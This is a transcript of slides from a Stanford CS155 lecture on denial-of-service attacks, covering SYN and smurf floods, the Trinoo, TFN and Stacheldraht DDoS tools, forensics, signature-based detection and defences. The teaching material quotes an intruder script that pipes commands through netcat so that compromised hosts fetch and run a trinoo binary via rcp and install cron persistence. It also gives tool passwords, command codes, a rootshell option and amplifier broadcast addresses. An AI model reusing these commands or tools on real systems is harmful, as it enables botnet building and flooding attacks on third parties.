1 / 60

Denial of Service CS155 Spring Quarter

Denial of Service CS155 Spring Quarter. David Brumley dbrumley@stanford.edu. Overview. Overview/History of DoS Traditional DoS DDoS Tracking DoS Preventative Measures Conclusion. Who are we talking about?. Gov’t (NSA). R &D Labs/Universities. Computer Professionals. Exploit Writers.

johnnyj
Télécharger la présentation

Denial of Service CS155 Spring Quarter

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Denial of ServiceCS155 Spring Quarter David Brumleydbrumley@stanford.edu

  2. Overview • Overview/History of DoS • Traditional DoS • DDoS • Tracking DoS • Preventative Measures • Conclusion

  3. Who are we talking about? Gov’t (NSA) R &D Labs/Universities Computer Professionals Exploit Writers Script Kiddies

  4. Example: GRC.COM

  5. Example: GRC.COM hi, its me, wicked, im the one nailing the server with udp and icmp packets, nice sisco router, btw im 13, its a new addition, nothin tracert cant handle, and ur on a t3.....so up ur connection foo, we will just keep comin at you, u cant stop us "script kiddies" because we are better than you, plain and simple. ------------------- Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….

  6. Classic DoS • Fork/malloc() bomb • Flooding • June 1996 1st Adv. on UDP flooding • Theme: Exploit finite queue or exposed unoptimized interface • Fix 1: limit interface • Fix 2: optimize interface

  7. Example: SYN Flooding 1 2 • Fix 1: Minimal state cache @ A • Fix 2: SYN Cookies Syn A Ack SYNACK B Overall Fixing is Non-Trivial Programming

  8. Most Prevalent Attacks • Jolt/jolt2: IP Fragment Reassembly (UDP and TCP) • Stream/raped: Flood with ACK’s • Trash: IGMP Flooding • Mix UDP/TCP/ICMP flooding • Starting to target routers instead of hosts

  9. Distributed Attack: Smurf …10’s to 100’s of hosts..

  10. Amplification Networks • Netscan.org 210.95.3.128 427 (Korea) 203.252.30.0 401 (Korea) 203.252.30.255 390 (Korea) 210.95.3.255 300 (Korea) 130.87.223.255 174 (Japan) 206.101.110.127 (US) • Average amplification: 4

  11. Ping Attack PING 206.101.110.127: 56 data bytes no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec no reply from 206.101.110.127 within 1 sec ….

  12. Ping Attack 64 bytes from 206.101.110.1: seq=13 ttl=21 time=127 ms. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=171 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=175 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=181 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=185 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=216 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=220 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=222 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=229 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=230 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=241 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=243 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=248 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=254 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=259 ms, duplicate. ….

  13. Ping Attack 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1513 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1518 ms, duplicate. …. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1571 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate. 64 bytes from 206.101.110.1: seq=13 ttl=21 time=1572 ms, duplicate. ….

  14. Ping Attack packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42): Time to live exceeded packet seq=13 bounced at radio-adventures-corp.Washington.cw.net (208.173.12.42) : Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded packet seq=13 bounced at 208.155.245.6: Time to live exceeded 64 bytes from 206.101.110.1: seq=13 ttl=21 time=6917 ms, duplicate. packet seq=13 bounced at bar6-loopback.Washington.cw.net (206.24.226.11): Time to live exceeded

  15. Bad guys point of view • What to do if smurf no longer works? • Admins could disable broadcast • Admins could filter from broadcast networks

  16. Distributed DoS Client Handlers/Masters Agents/Daemons

  17. Building DDoS Networks • Launch exploit • Log in through back door • Install daemon • Install "rootkit" to hide daemon • Repeat

  18. Result of Exploit Normal System: sunset:security> telnet elaine Trying 171.64.15.86... Connected to elaine21.stanford.edu. Escape character is '^]'. UNIX(r) System V Release 4.0 (elaine21.Stanford.EDU) elaine21.Stanford.EDU login: Hacked System: sunset:security> telnet jimi-hendrix 1524 Trying 171.65.38.180... Connected to jimi-hendrix.Stanford.EDU (171.65.38.180). Escape character is '^]'. # ls -altr /; total 1618 -r-xr-xr-x 1 root root 1541 Oct 14 1998 .cshrc drwx------ 2 root root 8192 Apr 14 1999 lost+found drwxr-xr-x 1 root root 9 Apr 14 1999 bin drwxrwxr-x 2 root sys 512 Apr 14 1999 mnt

  19. Automated exploit ./trin.sh | nc 128.aaa.167.217 1524 & ./trin.sh | nc 128.aaa.167.218 1524 & ./trin.sh | nc 128.aaa.167.219 1524 & ./trin.sh | nc 128.aaa.187.38 1524 & ./trin.sh | nc 128.bbb.2.80 1524 & ./trin.sh | nc 128.bbb.2.81 1524 & ./trin.sh | nc 128.bbb.2.238 1524 & ./trin.sh | nc 128.ccc.12.22 1524 & ./trin.sh | nc 128.ccc.12.50 1524 & Trin.sh echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit" Example Intruder Script

  20. RCP Jun 30 07:55:12 6E:rmt_sgi3 rshd[8111]: root@poot.Stanford.EDU as demos: cmd='/u sr/lib/sunw,rcp -f neet.tar' Jun 30 07:55:12 6E:rmt_sgi3 rshd[8112]: root@crash-bandit.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar' Jun 30 07:55:12 6E:rmt_sgi3 rshd[8113]: root@galena.Stanford.EDU as demos: cmd=' /usr/lib/sunw,rcp -f neet.tar' Jun 30 07:55:12 6E:rmt_sgi3 rshd[8117]: root@gradegrinder.Stanford.EDU as demos: cmd='/usr/lib/sunw,rcp -f neet.tar' Jun 30 07:55:12 6E:rmt_sgi3 rshd[8124]: root@galena.Stanford.EDU as demos: cmd=' rcp -f neet.tar' Jun 30 07:55:12 6E:rmt_sgi3 rshd[8127]: root@poot.Stanford.EDU as demos: cmd='rc p -f neet.tar' …. Over 200 hosts compromised!

  21. DDoS Networks • Trinoo: June/July 1999 • TFN: August/September 1999 • Stacheldraht: Sept/October 1999 • IRC Botnet: More recent

  22. Trinoo Overview • Communication • Attacker to Masters(s): 27665/tcp • Master to daemon(s): 27444/udp • Daemon to Master(s): 31335/udp • List of masters hard coded into clients • UDP Flooder

  23. Trinoo Master • Daemon list blowfish encrypted • Crypt() password required for startup # ./master ?? wrongpassword # . . . # ./master ?? gOrave trinoo v1.07d2+f3+c

  24. Trinoo Master Commands • die • mtimer (set DoS timer) • dos IP • mdie (password required) • mping - send "PING" command, should get a "PONG" • mdos • info - print version information • msize - Set DoS packet size • killdead - Solicits "*HELLO*" from clients, else removes entry • bcast - list hosts • mstop - attempt to stop DoS. Not implemented :)

  25. # strings - master . . . ---v v1.07d2+f3+c trinoo %s l44adsl <- Cleartext daemon password sock 0nm1VNMX… <- crypt(g0rave) local master 10:09:24 Sep 26 1999 trinoo %s [%s:%s] bind read *HELLO* ZsoTN.cq4X31 <- Blowfish crypt key bored NEW Bcast - %s PONG PONG %d Received from %s Warning: Connection from %s beUBZbLtK7kkY <- crypt(betalmostdone) trinoo %s..[rpm8d/cb4Sx/] . . . DoS: usage: dos DoS: Packeting %s. aaa %s %s mdie ErDVt6azHrePE <- crypt(killme) for mdie mdie: Disabling Bcasts. d1e %s mdie: password? Analysis of Handler

  26. Starting the client sends "*HELLO*" to the master Commands of form "arg1 password arg2" aaa pass IP - DoS IP on random UDP ports bbb pass N - Sets time limits png pass - send a "PONG" to the master on port 31335/udp d1e pass ... Note that UNIX strings by default only displays 4 or more ASCII characters! # strings --bytes=3 ns | tail -15 socket bind recvfrom l44 %s %s %s aIf3YWfOhw.V. aaa bbb shi png PONG d1e rsz xyz *HELLO* Daemon Forensics

  27. Trinoo LSOF # lsof | egrep ":31335|:27665" master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN) # lsof -p 1292 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME master 1292 root cwd DIR 3,1 1024 14356 /tmp/... master 1292 root rtd DIR 3,1 1024 2 / master 1292 root txt REG 3,1 30492 14357 /tmp/.../master master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so master 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so master 1292 root 0u CHR 4,1 2967 /dev/tty1 master 1292 root 1u CHR 4,1 2967 /dev/tty1 master 1292 root 2u CHR 4,1 2967 /dev/tty1 master 1292 root 3u inet 2534 UDP *:31335 master 1292 root 4u inet 2535 TCP *:27665 (LISTEN)

  28. Trinoo Forensics • Master IP addresses visible • Enough strings to recognize daemon/master easily • Listening TCP/UDP ports can be seen with "lsof" • Attacker session not encrypted

  29. Tribal Flood Network • Communication: • Client to handler: none • Handler <-> agent: ICMP Echo Reply • DOS Types • SYN • UDP • ICMP • With spoofing capabilities

  30. TFN Handler -------------------------------------------------------------- [tribe flood network] (c) 1999 by Mixter usage: ./tfn [ip] [port] contains a list of numerical hosts that are ready to flood -1 for spoofmask type (specify 0-3), -2 for packet size, is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp, 4 to bind a rootshell (specify port) 5 to smurf, first ip is target, further ips are broadcasts [ip] target ip[s], separated by @ if more than one [port] must be given for a syn flood, 0 = RANDOM --------------------------------------------------------------------

  31. TFN Commands #define ID_ACK 123 /* for replies to the client */ #define ID_SHELL 456 /* to bind a rootshell, optional */ #define ID_PSIZE 789 /* to change size of udp/icmp packets */ #define ID_SWITCH 234 /* to switch spoofing mode */ #define ID_STOPIT 567 /* to stop flooding */ #define ID_SENDUDP 890 /* to udp flood */ #define ID_SENDSYN 345 /* to syn flood */ #define ID_SYNPORT 678 /* to set port */ #define ID_ICMP 901 /* to icmp flood */ #define ID_SMURF 666 /* haps! haps! */

  32. Identifying an Agent ------------------------------------------------------------------------------ td 5931 root cwd DIR 3,5 1024 240721 /usr/lib/libx/... td 5931 root rtd DIR 3,1 1024 2 / td 5931 root txt REG 3,5 297508 240734 /usr/lib/libx/.../td td 5931 root 3u sock 0,0 92814 can't identify protocol ------------------------------------------------------------------------------

  33. Network Example # ./tfn iplist 4 12345 [tribe flood network] (c) 1999 by Mixter # tcpdump -lnx -s 1518 icmp tcpdump: listening on eth0 05:51:32.706829 10.0.0.1 > 192.168.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 64d1 01c8 0000 3132 3334 3500 05:51:32.741556 192.168.0.1 > 10.0.0.1: icmp: echo reply .... .... .... .... .... .... .... .... .... .... 0000 6cae 007b 0000 7368 656c 6c20 626f 756e 6420 746f 2070 6f72 7420 3132 3334 350a 00 <- 0x01C8 = 456 base 10 “12345” in data portion <- 0x007b= 123 base 10

  34. Forensics • Easy to spot in lsof (+) • ICMP easy to disguise (-) • ICMP ECHO_REPLY often allowed through firewall (-) • Attackers session not encrypted

  35. Stacheldraht • Communication: • Client <-> Handler: 16660/tcp • Handler <-> agent: 65000/tcp, ICMP_ECHOREPLY • Doesn’t use agent TCP for anything on versions I’ve seen • Client/handler traffic blowfish encrypted • UDP/TCP/ICMP flooding w/ spoofing

  36. Stacheldraht Client and Handler • Client to handler blowfish encrypted w/ password “authentication” • Handler password “sicken” encrypted with crypt() • More proactive at identifying live/dead hosts: Similar to distributed network • Handler limited to 1000 agents

  37. Handler Strings starting trinoo emulation... removing useful commands. - DONE - available commands in this version are: -------------------------------------------------- .mtimer .mudp .micmp .msyn .msort .mping .madd .mlist .msadd .msrem .distro .help .setusize .setisize .mdie .sprange .mstop .killall .showdead .showalive usage: .distro <user> <server that runs rcp> remember : the distro files need to be executable! that means: chmod +x linux.bin , chmod +x sol.bin ;)) sending distro request to all bcasts.... user : %s rcp server :

  38. Stacheldraht Agent • Interesting addition: Upgrade feature via rcp • Attempts spoofed packet to handler to test if spoofing is possible • Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”) • On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”

  39. DoS BotNets • Scan for vulnerable hosts • Infect • Join IRC channel and wait for further commands • Generally used for warez distribution as well • Example: Kaiten

  40. Fighting DDoS:Identify Agents • Strings of master in daemon • Finding master is important! • Dump and log as much as possible

  41. Identifying DDoS Agents • Counter-espionage/intrusion • Identify intruders signature • Look for that signature • RID

  42. RID Examples start AgentStacheldraht send icmp type=0 id=668 data="" recv icmp type=0 id=669 data="sicken" nmatch=2 end AgentStacheldraht start AgentStacheldraht4 send icmp type=0 id=6268 data="" recv icmp type=0 id=669 data="sicken" nmatch=2 end AgentStacheldraht4

  43. More RID Examples start AgentTFN send icmp type=0 id=789 recv icmp type=0 id=123 nmatch=2 end AgentTFN start AgentTrinoo send udp dport=27444 data="png l44adsl" recv udp data="PONG" nmatch=1 end AgentTrinoo

  44. RID @ Stanford • start telnetd send tcp dport=7000 data="\r\n" recv tcp data="Ataman Telnetd" nmatch=1 end telnetd • ./rid -t 20 -b 255 -n 2 171.64.0.0/16 **** 171.64.250.82 infected with telnetd **** 171.64.245.132 infected with telnetd **** 171.64.245.76 infected with telnetd **** 171.64.245.22 infected with telnetd **** 171.64.241.116 infected with telnetd … • 156 Total!

  45. General DDoS Observations • Intruders mix encryption mechanisms • No architecture in security design • Easily recognizable via strings

  46. Defending against DoS • Resisting DoS • Filtering • Traffic Shaping • Pure filtering • Ingress = incoming • Egress = outgoing • Locating attacker(s) • Logging • Automatic trace back • Packet tagging

  47. Logging • Audit utilities: • Tcpdump • Argus • Cisco Netflow • Problem: huge data sets • Asta.com: netflow monitor

  48. Input Logging • Log on to nearest router • Enable input debugging on router • Find upstream • Recurse v a

  49. Controlled Flooding • Cheswick & Burch • Idea: Follow the slowest routers • Problems: obvious Attacker R3 R1 R2 Victim

  50. p(p-1)2 p(p-1) p Node Sampling - Savage et alMethod 1 • Use fragment ID • Mark packets with prob. p of router address • Issues: • p > 0.5 • Long time to infer path (-) • Multiple attackers at same dist (-) Attacker R4 R3 R1 R2 R5 R6 Victim

More Related